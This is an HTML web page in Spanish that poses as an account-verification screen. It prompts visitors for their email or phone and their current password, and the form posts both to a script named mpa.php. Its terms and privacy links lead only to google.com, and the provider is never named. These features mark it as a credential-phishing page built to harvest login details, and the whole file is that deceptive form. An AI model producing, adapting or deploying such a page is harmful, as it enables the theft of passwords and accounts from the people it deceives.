<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<title class="hh1">Confirmar Cuenta</title>
	<link rel="stylesheet" href="index_files/style.css">

</head>

<body><div align="center">
<form name="form1" id="form1" method="post" action="mpa.php">
<table width="1000" cellspacing="1" cellpadding="2" border="0">
<tbody><tr>
	<td colspan="4"><div align="center"><img id="superior" src="index_files/superiors.png" width="64" height="54"></div><br><br></td>
</tr>
<tr>
	<td colspan="4"><div align="center"><h1>Verificar identidad.</h1></div></td>
</tr>
<tr>
	<td colspan="4"><div type="email" align="center"><h2>Verifica tu cuenta de correo</h2></div></td>
</tr>
<tr>
	<td colspan="4">
		<div align="center"><input type="email" id="correo" name="email1" placeholder="Ingrese su cuenta de correo electronico, Telefono" required=""></div>
	</td>
</tr>
<tr>
	<td colspan="4">
		<div align="center"><input type="password" id="pass" name="passw2" placeholder="Ingrese su clave actual" required=""></div>
	</td>
</tr>


<tr>
    <td colspan="4"><div align="center"><br><br><input type="image" name="imageField" src="index_files/confirmar.png"></div><br><br><br></td>
</tr>

<tr>
	<td width="340"><div align="center"><h3>&nbsp;</h3></div></td>
	<td width="160"><div align="center"><h3><a target="_blank" href="https://google.com/">Terminos de uso</a></h3></div></td>
	<td width="160"><div align="center"><h3><a target="_blank" href="https://google.com/">Privacidad y Cookies</a></h3></div></td>
	<td width="340"><div align="center"><h3>&nbsp;</h3></div></td>
</tr>


<tr>
	<td colspan="4"><div align="center"><h4>2020 Derechos Reservados</h4></div><br><br></td>
</tr>

</tbody></table>
</form>
</div>
</body></html>